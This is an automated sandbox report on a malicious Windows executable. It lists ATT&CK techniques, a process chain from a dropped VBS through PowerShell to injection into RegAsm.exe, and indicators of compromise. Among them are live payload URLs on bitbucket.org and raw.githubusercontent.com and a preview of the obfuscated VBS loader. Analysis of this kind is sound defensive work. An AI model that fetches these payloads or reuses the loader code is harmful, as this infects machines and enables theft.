Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Windows Management Instrumentation; 12 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 211 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 51 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 211 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 2 File and Directory Discovery; 27 System Information Discovery; 21 Security Software Discovery; 1 Process Discovery; 51 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1527751 | Sample: OTO2wVGgkl.exe | Start date: 07/10/2024 | Architecture: WINDOWS | Score: 100

Start node (2): contacts raw.githubusercontent.com, bitbucket.org and 4 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures.

Process tree (graph node numbers in parentheses; the small numbers in square brackets after a process name are that node's counter badges as drawn in the graph):

OTO2wVGgkl.exe (11) [1 3], started
  dropped: C:\Users\user\AppData\Local\Temp\...\123.vbs, ASCII (36)
  cmd.exe (17) [3 2], started
    wscript.exe (19) [1], started
      signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
      powershell.exe (24) [7], started
        signatures: Suspicious powershell command line found; Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading
        powershell.exe (27) [14 25], started
          network: raw.githubusercontent.com 185.199.111.133, 443, 49725, FASTLYUS, Netherlands (44); bitbucket.org 185.166.143.48, 443, 49752, AMAZON-02US, Germany (46); s3-w.us-east-1.amazonaws.com 16.182.70.97, 443, 49760, unknown, United States (48)
          signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes; Loading BitLocker PowerShell Module
          RegAsm.exe (33) [3], started
            signatures: Reads the System eventlog
        conhost.exe (31), started
    conhost.exe (22), started
svchost.exe (14) [1 1], started
  network: 127.0.0.1 unknown unknown (50)

Initial sample
Source | Detection | Scanner | Label
OTO2wVGgkl.exe | 11% | ReversingLabs |
OTO2wVGgkl.exe | 21% | Virustotal |

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches

Domains
Source | Detection | Scanner | Label
s3-w.us-east-1.amazonaws.com | 0% | Virustotal |
bitbucket.org | 0% | Virustotal |
raw.githubusercontent.com | 0% | Virustotal |
bbuseruploads.s3.amazonaws.com | 3% | Virustotal |
18.31.95.13.in-addr.arpa | 0% | Virustotal |
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 16.182.70.97 | true | false | | unknown
bitbucket.org | 185.166.143.48 | true | true | | unknown
raw.githubusercontent.com | 185.199.111.133 | true | true | | unknown
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | unknown
18.31.95.13.in-addr.arpa | unknown | unknown | false | | unknown

URLs
Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/rulmerurk/ertertqw/downloads/po06.txt | false | | unknown
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723 | true | | unknown
                https://aka.ms/pscore68powershell.exe, 00000006.00000002.2635327490.0000018823550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2635327490.00000188234E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://bitbucket.orgpowershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmptrueunknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | true
16.182.70.97 | s3-w.us-east-1.amazonaws.com | United States | unknown | unknown | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
                IP
                127.0.0.1
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1527751
                Start date and time:2024-10-07 09:32:16 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 40s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:OTO2wVGgkl.exe
                renamed because original name is a hash value
                Original Sample Name:63af3844e6d0a5fa89da17713ce1fb59.exe
                Detection:MAL
                Classification:mal100.spre.expl.evad.winEXE@15/13@4/4
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 44
                • Number of non-executed functions: 29
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1776 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:33:15 | API Interceptor | 41x Sleep call for process: powershell.exe modified
03:33:23 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
185.166.143.48 | https://tiotapas.com.au | malicious | Unknown
185.166.143.48 | file.exe | malicious | Unknown
185.166.143.48 | envifa.vbs | malicious | Unknown
185.166.143.48 | SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer
185.166.143.48 | https://www.getcoloringpages.com/coloring/359 | malicious | Unknown
185.166.143.48 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser
185.166.143.48 | Leer documentos confidenciales anexos por parte de la Corte Suprema De Justicia.vbs | malicious | Unknown
185.166.143.48 | scan_documet_027839.vbs | malicious | Unknown
185.166.143.48 | UBONg7lmVR.exe | malicious | Unknown
185.166.143.48 | Notificacon Documneto (2).vbs | malicious | Unknown
185.199.111.133 | na.rtf | malicious | Remcos
185.199.111.133 | na.rtf | malicious | Remcos
185.199.111.133 | na.hta | malicious | Cobalt Strike
185.199.111.133 | http://mr-zkpak47.github.io/Netflix_Front_Page | malicious | HTMLPhisher
185.199.111.133 | http://sachinchaunal.github.io/Netflix-Clone-Old-Version | malicious | HTMLPhisher
185.199.111.133 | na.rtf | malicious | Unknown
185.199.111.133 | http://ravichandra1816.github.io/Netflix-clone | malicious | HTMLPhisher
185.199.111.133 | MKWbWHd5Ni.rtf | malicious | Remcos
185.199.111.133 | Windows PowerShell.lnk | malicious | Unknown
185.199.111.133 | Bootstrapper V1.19.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | k4STQvJ6rV.vbs | malicious | XWorm | 185.199.108.133
raw.githubusercontent.com | Request For Quotation.js | malicious | AgentTesla | 185.199.108.133
raw.githubusercontent.com | PO.78NO9.xls | malicious | FormBook | 185.199.108.133
raw.githubusercontent.com | Company Profile.vbs | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | ls6sm8RNqn.rtf | malicious | Remcos | 185.199.109.133
raw.githubusercontent.com | na.rtf | malicious | Remcos | 185.199.109.133
raw.githubusercontent.com | na.rtf | malicious | Remcos | 185.199.109.133
raw.githubusercontent.com | na.rtf | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | na.rtf | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | na.rtf | malicious | Remcos | 185.199.109.133
s3-w.us-east-1.amazonaws.com | http://tkweb.life/ | malicious | Unknown | 52.217.0.204
s3-w.us-east-1.amazonaws.com | http://coinbassewalletextensin.gitbook.io/us | malicious | Unknown | 52.217.120.97
s3-w.us-east-1.amazonaws.com | http://ravichandra1816.github.io/Netflix-clone | malicious | HTMLPhisher | 3.5.21.123
s3-w.us-east-1.amazonaws.com | http://www.auth.coin-cloud.info/ | malicious | Unknown | 52.217.13.180
s3-w.us-east-1.amazonaws.com | http://www.auth.coin-cloud.info/ | malicious | Unknown | 16.182.32.121
s3-w.us-east-1.amazonaws.com | https://pub-8dc94ac03e5a4ccc9206980dbd33a882.r2.dev/ddd.html#3mail@b.c | malicious | Unknown | 3.5.25.154
s3-w.us-east-1.amazonaws.com | https://syncmart.shop/ | malicious | Unknown | 3.5.30.83
s3-w.us-east-1.amazonaws.com | http://syncmart.shop/wap/ | malicious | Unknown | 54.231.229.217
s3-w.us-east-1.amazonaws.com | https://djisaji.cc/ | malicious | Unknown | 54.231.203.1
s3-w.us-east-1.amazonaws.com | http://www.tkmall-wholesale.com/ | malicious | Unknown | 3.5.29.123
bitbucket.org | https://tiotapas.com.au | malicious | Unknown | 185.166.143.48
bitbucket.org | GGLoader.exe | malicious | Laplas Clipper, SilentCrypto Miner | 185.166.143.49
bitbucket.org | file.exe | malicious | Unknown | 185.166.143.48
bitbucket.org | sostener.vbs | malicious | Njrat | 185.166.143.50
bitbucket.org | sostener.vbs | malicious | XWorm | 185.166.143.50
bitbucket.org | 0XVZC3kfwL.exe | malicious | Unknown | 185.166.143.49
bitbucket.org | nTHivMbGpg.exe | malicious | Unknown | 185.166.143.50
bitbucket.org | sRMytgfRpJ.exe | malicious | RedLine | 185.166.143.49
bitbucket.org | envifa.vbs | malicious | Unknown | 185.166.143.48
bitbucket.org | sostener.vbs | malicious | Njrat | 185.166.143.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | http://pub-873fc6a3edb941c6a17f50911dfca518.r2.dev/dbm.html | malicious | HTMLPhisher | 151.101.66.137
FASTLYUS | http://pub-a81aa4bbf83846b8a892985d5bbc3a6f.r2.dev/pppindex.html | malicious | HTMLPhisher | 151.101.2.137
FASTLYUS | http://joeandvelma.wixsite.com/my-site/ | malicious | Unknown | 199.232.188.157
FASTLYUS | http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.html | malicious | Unknown | 151.101.194.137
FASTLYUS | http://alaindemeuron.wixsite.com/my-site/ | malicious | Unknown | 199.232.188.157
FASTLYUS | https://pink664912.studio.site/ | malicious | Unknown | 151.101.2.109
FASTLYUS | http://pub-7ccd9eed2f7746f0844d3881a62a4c3f.r2.dev/blob%20(1).html | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | http://zlraatonlinefirsatnoktalar.xyz/ | malicious | Unknown | 151.101.2.137
FASTLYUS | https://login-att-com.weebly.com/ | malicious | HTMLPhisher | 151.101.65.46
FASTLYUS | Farahexperiences.com_Report_52288.pdf | malicious | Unknown | 151.101.129.44
AMAZON-02US | http://pub-873fc6a3edb941c6a17f50911dfca518.r2.dev/dbm.html | malicious | HTMLPhisher | 35.156.224.161
AMAZON-02US | http://pub-a81aa4bbf83846b8a892985d5bbc3a6f.r2.dev/pppindex.html | malicious | HTMLPhisher | 3.72.140.173
AMAZON-02US | http://joeandvelma.wixsite.com/my-site/ | malicious | Unknown | 99.86.4.125
AMAZON-02US | http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.html | malicious | Unknown | 3.72.140.173
AMAZON-02US | http://alaindemeuron.wixsite.com/my-site/ | malicious | Unknown | 99.86.4.125
AMAZON-02US | https://pink664912.studio.site/ | malicious | Unknown | 3.161.82.86
AMAZON-02US | http://pub-7ccd9eed2f7746f0844d3881a62a4c3f.r2.dev/blob%20(1).html | malicious | HTMLPhisher | 35.156.224.161
AMAZON-02US | http://advertising-copyright-review.d2taqiqjh5pjw0.amplifyapp.com/ | malicious | Unknown | 65.9.66.32
AMAZON-02US | http://tkweb.life/ | malicious | Unknown | 52.217.0.204
AMAZON-02US | https://login-att-com.weebly.com/ | malicious | HTMLPhisher | 44.236.126.52
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.html | malicious | Unknown | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | http://advertising-copyright-review.d2taqiqjh5pjw0.amplifyapp.com/ | malicious | Unknown | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | http://top10-vir4ls-jandamelayu-xs1.biz.id/ | malicious | Unknown | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://login-att-com.weebly.com/ | malicious | HTMLPhisher | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | sam.exe | malicious | MassLogger RAT, PureLog Stealer | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://pages.tempisite.com/Meta-business | malicious | Unknown | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | ENQUIRY NEED QUOTATION.exe | malicious | Snake Keylogger, VIP Keylogger | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | New order.exe | malicious | AgentTesla | 16.182.70.97, 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | http://netflix.dittmedlemskap.com/ | malicious | Unknown | 16.182.70.97, 185.166.143.48, 185.199.111.133
                                                        No context
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.7263294577517858
                                                        Encrypted:false
                                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0o:9JZj5MiKNnNhoxuB
                                                        MD5:CB083CD0FF560C343A825D78AE2AC5B1
                                                        SHA1:C90D6420536DB1D4204F42DAA0E1C024461988A0
                                                        SHA-256:697F8401C7DBC548BBE340B5EF3070C5B07C89BD0C794A74DC17F3D38893135F
                                                        SHA-512:D9BE399AB06ABE86372E17FF489FD268C548B5E421780833E974F310116C85F32EA39B2F59E5D892B9574A82D5EE7A24D20B630D12932A950821A26DC8EB3361
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0xba3d4c64, page size 16384, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.7556000801711509
                                                        Encrypted:false
                                                        SSDEEP:1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                                                        MD5:2B29DA373ADCE2DD4B5AD81117BB39A3
                                                        SHA1:C015E10185DA7BC6158CB7C0200CDFD4F5D2C347
                                                        SHA-256:1128DB8BFF9DF5D2D4022E7962E20080959965299A4C99A5A7A63995D53F43D0
                                                        SHA-512:7032064148E8A9CB726D7B47D1D6BE681CBBC1CF4298C0EB7EC2534D3D0986627F464826FAD75C20EDD533B69058C84D67A190F9B399B5C4FBDDE2AE5E67CA4A
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.07717234446590013
                                                        Encrypted:false
                                                        SSDEEP:3:jc//EYeKLiBeag3NaAPaU1lUiiBetlAlluxmO+l/SNxOf:jcUzKiBdANDPaUMn+AgmOH
                                                        MD5:F6E0BFE9ABC1ECF6C83744BC514FEB5F
                                                        SHA1:6F095655251A64FA0C5E3E7C0906557DBD43B028
                                                        SHA-256:7935F618DB5467AB30300A0D496AFDCFA96B7DFBF19558DD5D6BD069CC6C3C12
                                                        SHA-512:3B0399BF2533D37AC121B7485DBEEF00F128828BD9965FD4A84E1F587EF312A0D1236B4C58816F64E1772EB75265C52B065D86F26EA9203E161E6798A49743CC
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1119
                                                        Entropy (8bit):5.345080863654519
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:MxHKlYHKh3oIHKx1qHitHo6hAHKze0Hj
                                                        MD5:1B6869C1B7FFE2691B415D60A088004E
                                                        SHA1:D65C5293683E856ADA02D8F34B1B2CE07EAE707B
                                                        SHA-256:BEE51687135C913F56858329E75BE03DE454DA5669891450A221567029FE9F06
                                                        SHA-512:996C59693C3A5604CA7519A8E5CA1E77D0213E04FA77671623DA6452A9E42C13BBFE577F4EEA21DEE48D08B36E3F65432D6C943A1FE9F60336B8709ED21A6D2B
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:Nllluln52llp:NllUol
                                                        MD5:DD1511ADD69A2BBFD772EE49C6828FBD
                                                        SHA1:D446C5D5B1209CCE7FA673473F913DB360F5931A
                                                        SHA-256:C687FDA1A7A70346FE15F2420682B39C0185696575E46E9785C150FC06D3A629
                                                        SHA-512:46A7C2240420741311A83BE91CC32B224ABA2100DA18302F8347D5CA4DAB58B7B5CE81591D0BBCCB63C38004D49249850E35A7F8F72232072F0126EB9891FEE4
                                                        Malicious:false
                                                        Preview:@...e................................................@..........
                                                        Process:C:\Users\user\Desktop\OTO2wVGgkl.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):15444
                                                        Entropy (8bit):5.437718567251256
                                                        Encrypted:false
                                                        SSDEEP:384:OJvqOlYGFrIkTJxYBNF+qukPJmxNSiMFpW+jaA:OJv9lYkrT8DF+XwW2hjaA
                                                        MD5:90476F013B7E7E03253D8121ECE7133C
                                                        SHA1:BCF9262009EEBB2D75BA97A3DCFA1B60368671CB
                                                        SHA-256:9787A66FC34711106B281253D196D2DD7271C05E6D52005D5CA28D515528F374
                                                        SHA-512:69856317A25B202CCB6883A685E65663EF52137316CD8CA6454933F7B44C0AD8FD375699A565C97D7B24DC6D0AF97062EC73E55AF882D404D2D323D51560B15E
                                                        Malicious:true
                                                        Preview: 'g..hbphckjogFF = rRegisggfgtertehkggns2211 & ""..Call Uglisging("")..Call Uglisging("")..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#G")..Call Uglisging("k#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#")..edIrhch = LenB("iFodegIm")..Const kIfrIckak = "enfFjIgo"..'kphnjbAd kdScFmri..mpoIcmbnd = LenB("hndmjSd")..Const gemkjAarh = "AchkAok"..Call Uglisging("B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#")..Call Uglisging("dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE")..Call Uglisging("#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#Y")..Call Uglisging("wB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bg")..Const hikpffF = "haImedbe"..'arpkpir hnoaSpI..aaSiFokm = LenB("pFaekAcn")..Const kSFakck = "mknobdbe"..'gfnSIFm gkInbrj..Call Uglisging("Br#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs")..'SmFnrjkp Abmjmnfk..diSpdfFb = LenB("mmbfnApaa")..Const kknchcSd = "cgkgekabS"..'IdgmkrA mkehkba..jdjiFkim = LenB("g
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Entropy (8bit):6.859449944222372
                                                        TrID:
                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                        • DOS Executable Generic (2002/1) 0.92%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:OTO2wVGgkl.exe
                                                        File size:164'352 bytes
                                                        MD5:63af3844e6d0a5fa89da17713ce1fb59
                                                        SHA1:8b457819c6b7ce8e04755ef75b8ce176bc58fb28
                                                        SHA256:7507af39b3ed38d361e06c2a232d5703369bb11706184d0d10318a5ff3d9cabc
                                                        SHA512:9aca0ac9aa6a344d5d97149aa9c272025623623cfe81dea9dee0c95f16e45c8c2b168756d707ba30c25fff2ec09428699de6ab956da1bd29efc06aae7416910e
                                                        SSDEEP:3072:QahKyd2n31N5GWp1icKAArDZz4N9GhbkrNEk1EYT:QahO5p0yN90QEvE
                                                        TLSH:66F39D1A63E420A6E4BA53B198F202935A31BCB15B7892FF13D4D57E5E336C0A532F17
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                        Icon Hash:3b6120282c4c5a1f
                                                        Entrypoint:0x140008200
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x140000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:10
                                                        OS Version Minor:0
                                                        File Version Major:10
                                                        File Version Minor:0
                                                        Subsystem Version Major:10
                                                        Subsystem Version Minor:0
                                                        Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                                                        Instruction
                                                        dec eax
                                                        sub esp, 28h
                                                        call 00007F47FCB3BB00h
                                                        dec eax
                                                        add esp, 28h
                                                        jmp 00007F47FCB3B3ABh
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        dec eax
                                                        mov dword ptr [esp+08h], ebx
                                                        dec eax
                                                        mov dword ptr [esp+10h], edi
                                                        inc ecx
                                                        push esi
                                                        dec eax
                                                        sub esp, 000000B0h
                                                        and dword ptr [esp+20h], 00000000h
                                                        dec eax
                                                        lea ecx, dword ptr [esp+40h]
                                                        call dword ptr [000011CDh]
                                                        nop
                                                        dec eax
                                                        mov eax, dword ptr [00000030h]
                                                        dec eax
                                                        mov ebx, dword ptr [eax+08h]
                                                        xor edi, edi
                                                        xor eax, eax
                                                        dec eax
                                                        cmpxchg dword ptr [00004922h], ebx
                                                        je 00007F47FCB3B3ACh
                                                        dec eax
                                                        cmp eax, ebx
                                                        jne 00007F47FCB3B3BCh
                                                        mov edi, 00000001h
                                                        mov eax, dword ptr [00004918h]
                                                        cmp eax, 01h
                                                        jne 00007F47FCB3B3B9h
                                                        lea ecx, dword ptr [eax+1Eh]
                                                        call 00007F47FCB3B993h
                                                        jmp 00007F47FCB3B41Ch
                                                        mov ecx, 000003E8h
                                                        call dword ptr [0000117Eh]
                                                        jmp 00007F47FCB3B369h
